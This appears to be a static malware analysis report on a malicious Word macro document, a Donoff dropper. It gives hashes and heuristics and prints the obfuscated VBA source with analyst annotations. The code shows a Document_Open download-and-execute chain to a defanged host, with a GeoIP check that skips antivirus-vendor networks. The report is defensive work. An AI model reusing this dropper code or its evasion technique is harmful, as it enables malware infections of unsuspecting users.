Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c7b598140da262bd…

MALICIOUS

Office (OLE)

136.0 KB Created: 2016-06-02 21:49:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: f47fef0be28e55d53d653494caad00e8 SHA-1: a7816d48d7f84d39b7693dbf2a2af92d95b781d1 SHA-256: c7b598140da262bd51ad0f74ff104199cc305b128ce72aab8afe0a862a951f54
242 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1203 Exploitation for Client Execution (note: nothing in this analysis evidences an exploit — code runs only when the user enables the Document_Open macro, which maps more accurately to T1204.002 User Execution: Malicious File; the runtime string assembly in the macro also fits T1027 Obfuscated Files or Information)

The file contains VBA macros, including a Document_Open macro that uses CreateObject and CallByName, indicative of malicious intent. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' further confirms its malicious nature. The document body presents a deceptive invoice, suggesting a phishing or scam attempt to elicit payment details. The VBA macro code is obfuscated: its meaningful strings (COM property names, an HTTP header name, URLs) are never stored in clear but rebuilt at runtime by a character-stripping helper (JSwDt.XsUnlCKNXjhxcS), and the Document_Open handler chains — via an On Error handler that silently swallows any failure — into a routine that issues an HTTP request, stores the response at a path, and hands that path to a further helper, which is consistent with a download-and-execute stager. Decoding the visible string arguments also reveals a GeoIP self-lookup whose result is compared against a list before the download proceeds, i.e. a geo/ISP-based evasion gate. Only the macro source was carved from the sample; the second-stage payload is not part of this static analysis, so its behaviour is unknown.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — a standard OOXML schema namespace, not an attacker-controlled indicator. Note that URLs the macro builds at runtime from obfuscated literals (the JSwDt.XsUnlCKNXjhxcS calls in the preview) are not captured by this extractor and must be decoded manually.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19080 bytes
SHA-256: 9f40415f1923ec7b2047da095aaf52a9a901e1c325eaebc6b25d3335c38426ef
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Not referenced anywhere in the visible listing. Both parameters are unused,
' both callees are undefined in this preview, and the result is always False —
' reads as filler/decoy code (TODO confirm against the modules not shown here).
Private Function PNWJBCwrE(ByVal BiYiwKWotLwR As Integer, ByVal fchSZ As Integer) As Boolean
wLFLjcaYOzEos 8548, 6208, "N6KGo9rdzoKX8CihQK3k7iY8EUiJD"
ICCdfkdM
PNWJBCwrE = False
End Function
' Auto-execution entry point (source of the OLE_VBA_DOCOPEN finding): runs as
' soon as the document is opened with macros enabled. The two declared locals
' are never used; the only real work is the call into ngcfTspyAkrFfa.zjMGJXftUO,
' where the evasion check and download chain start.
Private Sub Document_Open()
Dim GZRfcMrT As String
Dim SYjdTW As Integer
ngcfTspyAkrFfa.zjMGJXftUO
End Sub
' Not referenced in the visible listing. The parameter is unused, every callee
' is undefined here, and the return value is a fixed literal — filler/decoy
' code (TODO confirm against the full module set).
Private Function zIAZr(ByVal UgWeAFhlfZe As Integer) As String
unrlrdDmaZaSn = True
pUWozfTKYQev True, "1g04zCUmQ88WdlWR51XZXTLYDK", 2464
pwsEB 7533
GSqbJyKDDjmjk "TGloVEhPsVMWow08rJqNeAQXL"
xgTsQuybTg
dybqrGv
zIAZr = "x7Dp2zhxVdAjFwPxx"
End Function
' Not referenced in the visible listing; parameters unused, callees undefined
' here. Same filler pattern as PNWJBCwrE / zIAZr.
Private Sub NGZFXMfYfMd(ByVal MngIdBnZt As Integer, ByVal wHkxxLNSV As Integer)
UkmZNoBp = True
RzymXXDIEq
wCsOtQyHhpGZJ
svKRngtUAI
End Sub

Attribute VB_Name = "ngcfTspyAkrFfa"
' Returns a de-obfuscated string. JSwDt.XsUnlCKNXjhxcS is defined outside this
' preview; under the reading that it removes every character of its 2nd
' argument from its 1st (the reading under which every call in this preview
' decodes cleanly) the result is "ResponseBody" — the property name TTwkEgzQC
' reads from the HTTP object. TODO confirm the helper's semantics in module JSwDt.
Private Function WQesRud() As String
WQesRud = JSwDt.XsUnlCKNXjhxcS("R0e0tstp0o8n se  Bo8idgy", "8tg iU0")
End Function
' Instantiates an arbitrary COM object from a caller-supplied ProgID (vkrwbf) —
' the source of the OLE_VBA_CREATEOBJ finding. The first two parameters are
' unused and JhjOfIkCHHzqQL returns the object unchanged, so this is a thin,
' obfuscated wrapper around CreateObject. No caller is visible in this preview.
Public Function avQabvXBC(ByVal byxfLUBUwe As Boolean, ByVal gRMRTnRpiCO As String, ByVal vkrwbf As String) As Object
Set avQabvXBC = JhjOfIkCHHzqQL("k0HS71N0ckSm07AHG39iP", CreateObject(vkrwbf))
End Function
' Identity pass-through: ignores its first argument, assigns an undeclared
' variable to a junk literal, and returns VLmWzvPBeAT unchanged. Exists only to
' add indirection around CreateObject (see avQabvXBC).
Private Function JhjOfIkCHHzqQL(ByVal GXlBLHoSdZde As String, ByVal VLmWzvPBeAT As Object) As Object
azcsLy = "VVo3dLP1JdYEJKlYwIZQFlqxtyG"
Set JhjOfIkCHHzqQL = VLmWzvPBeAT
End Function
' Not referenced in the visible listing; callees undefined here. Filler/decoy
' pattern (TODO confirm against the full module set).
Private Sub murvMkHZhky()
IaigNJ = 6716
FMRCTruVnn
uDBHdJOTHqW 3091, 8067, 9917
End Sub
' Fetch-and-store routine. JcNvnvI is a URL (see mVPFbYRecD); MLClgg is a
' destination that is handed on to HSrgevVvRWhDPh. The helper modules
' DALPJSOds / HSrgevVvRWhDPh / coPMakShCM are outside this preview, so the
' following is inferred: the obfuscated literal passed to rCeKxWHopVwVKQ
' decodes (char-strip reading of XsUnlCKNXjhxcS) to "Can't download binary
' file", which suggests that call sends the request and checks the outcome; the
' final statement reads the object's "ResponseBody" (WQesRud) and appears to
' write it to MLClgg. TODO confirm in the helper modules. Both locals are unused.
Private Sub TTwkEgzQC(ByVal MLClgg As String, ByVal JcNvnvI As String)
Dim cHBkYjIlvvkUTT As Integer
Dim CwrLG As String
Set iZGwmUBgS = DALPJSOds.LQAUYHMLbes(JcNvnvI, "2LDud2I6mD3zMcbyMwZHA4dgpvcWV", 8925)
DALPJSOds.rCeKxWHopVwVKQ JSwDt.XsUnlCKNXjhxcS("C:SaWnW'tI: dhoVTwn:lXohaWRd TbWhinIhaVryhS IfSil::e", "TXWhRI:VS"), iZGwmUBgS
HSrgevVvRWhDPh.RdPchyWLPrZLSx MLClgg, coPMakShCM.gDzhbFfIitrLG(iZGwmUBgS, "CCkLpwbqWUVdzP6ifoRvfrvuO7", WQesRud)
End Sub
' Orchestrates the second-stage download. Under the char-strip reading of
' XsUnlCKNXjhxcS the URL literal decodes to
'   hxxp://imbagscanta[.]com/image/logo.bin
' (absent from the EMBEDDED_URL list because it only exists after
' de-obfuscation; treat as an IOC once confirmed). The same value obtained from
' HSrgevVvRWhDPh.uDrJGhTuAw is used as the download target and then passed to
' qqKfXHEDuFbn — consistent with download-then-execute, but both helpers are
' outside this preview (TODO confirm). The middle assignment is junk.
Private Sub mVPFbYRecD()
TTwkEgzQC HSrgevVvRWhDPh.uDrJGhTuAw, JSwDt.XsUnlCKNXjhxcS("Dhtx8t8pR:/J/D8iJmxbakg8s8cka8nRDtakx.ckDoxmR/i8JmRagx8eJ/kl8okgok.Dbxkinx", "8kJRDx")
tiFzctERDq = "zi85IJzWAbiAFunn8R1EwhIRe"
HSrgevVvRWhDPh.qqKfXHEDuFbn HSrgevVvRWhDPh.uDrJGhTuAw
End Sub
' Entry point reached from Document_Open. Runs, in order: JSwDt.fQvBTJoJHymWgW
' (not visible here), the MlRZrJaO evasion gate, then the download chain
' (mVPFbYRecD). The error handler label has an empty body, so any runtime error
' — including the deliberate `Error 5` raised by MlRZrJaO — aborts the whole
' chain silently with no user-visible dialog. The two locals are unused.
Public Sub zjMGJXftUO()
Dim QSzWxH As Integer
Dim dzJrpHWpMQJvNk As Integer
On Error GoTo FGgodCgLjJCsUp
JSwDt.fQvBTJoJHymWgW
JSwDt.MlRZrJaO
mVPFbYRecD
Exit Sub
FGgodCgLjJCsUp:
End Sub
' Not referenced in the visible listing; parameter unused, callee undefined
' here, constant return. Filler/decoy pattern.
Private Function UzMdZwe(ByVal YYaXBF As String) As Integer
AjJdHZIlPBQJla "rgwD7xqT8epyUyeZv7RA4mu6K4yO", 2490
UzMdZwe = 1603
End Function

Attribute VB_Name = "JSwDt"
' Issues an HTTP request and returns its response text. Under the char-strip
' reading of XsUnlCKNXjhxcS the obfuscated arguments decode to:
'   URL      hxxps://www.maxmind[.]com/geoip/v2.1/city/me   (GeoIP lookup of the
'            victim's own public IP — the value later tested by MlRZrJaO)
'   header   "Referer" = hxxps://www.maxmind[.]com/en/locate-my-ip-address
'   result   "ResponseText"
' The argument shape of coPMakShCM.UENYxxYDlowuQO (object, name, ..., value)
' suggests it wraps CallByName (cf. the OLE_VBA_CALLBYNAME finding) — TODO
' confirm in module coPMakShCM. The first assignment is junk.
Private Function KhxjMEGnfDXEMZ() As String
KCHhdXN = 339
Set iZGwmUBgS = DALPJSOds.LQAUYHMLbes(JSwDt.XsUnlCKNXjhxcS("3hbtut3psl:T/IB/bwlww9b.mbTaTxmb3iBnVd.lc3oJmV/MgVueo3iI9pJ/JvV2.WJ19/cBVibt3y/lm9eI", "u3lI9BTbJMVW"), "Ytv1RfmldPiO3VKweHX4QFNb", 8925)
coPMakShCM.UENYxxYDlowuQO iZGwmUBgS, "koePH4JJMD1k2UvZq2", nBhZXXJbJfgrr, JSwDt.XsUnlCKNXjhxcS("ROJeOfOerOOe:r", ":MJ1Owj"), False, JSwDt.XsUnlCKNXjhxcS("Dhgt6tpQEsB:/Y/6wN6wwQ.6YmaBYxAmiAnEd6.F2co2mD/QeNnE/QlQoqcQYaNtYeD-mFyQq-qipA-ADad6dFQreBsgsq", "6qYBNE2FDQgA")
DALPJSOds.rCeKxWHopVwVKQ BgNMHVyVbPwk, iZGwmUBgS
KhxjMEGnfDXEMZ = coPMakShCM.gDzhbFfIitrLG(iZGwmUBgS, "81hfaiecd3PhFy98lpuj8061AUh8Q6sAt", JSwDt.XsUnlCKNXjhxcS("iRLeLspNoLNnsMieTNNexM6t", "M6LN2iH "))
End Function
' Decodes (char-strip reading of XsUnlCKNXjhxcS) to "RecentFiles". Not
' referenced in the visible listing; its consumer is presumably in the
' truncated part of the module — TODO confirm.
Private Function SRymzZwFBMEA() As String
SRymzZwFBMEA = JSwDt.XsUnlCKNXjhxcS("R3ZeZceZ5nHtgFi6l6e35s", "Hg6 5ZC3U")
End Function
' Evasion gate run before the download. hPhoEqK receives the GeoIP response
' from KhxjMEGnfDXEMZ; every entry of SabpSdOvH (defined outside this preview)
' is tested against it through MwoDglu.iUJgDSbNb (also not visible). On a
' match `Error 5` raises a runtime error; there is no handler in this Sub, so
' it propagates to zjMGJXftUO, whose empty On Error handler turns it into a
' silent exit — the sample simply does not detonate for a matching geo/ISP
' result. The assignment after `Error 5` is unreachable; the other assignments
' and the Boolean local are junk.
Public Sub MlRZrJaO()
Dim hPhoEqK As String
Dim smBfuWUObGJbm As Boolean
gFICAMxioTZUm = "710OMyUcatDRO3jWr6AyRWaYNNu"
hPhoEqK = KhxjMEGnfDXEMZ
For Each bHfSZgClB In SabpSdOvH
If MwoDglu.iUJgDSbNb("33A9kF9oYIOuKVImqMOW1d", hPhoEqK, bHfSZgClB) Then
Error 5
MyVFWz = 1566
End If
eyGiBkrwq = 483
Next
End Sub
' Decodes (char-strip reading of XsUnlCKNXjhxcS) to "ESET, spol" — the start of
' the organisation name of the ESET antivirus vendor, which is the kind of
' string a GeoIP "organisation/ISP" field would contain. Not referenced in the
' visible listing; plausibly one of the SabpSdOvH entries matched by MlRZrJaO,
' i.e. the macro avoids running from vendor networks — TODO confirm in the
' truncated part of the module.
Private Function MNmRMaFUFHzd() As String
MNmRMaFUFHzd = JSwDt.XsUnlCKNXjhxcS("qESnUETFn, FsMqpFolq", "F1inx7fMqU")
End Function
Pri
... (truncated)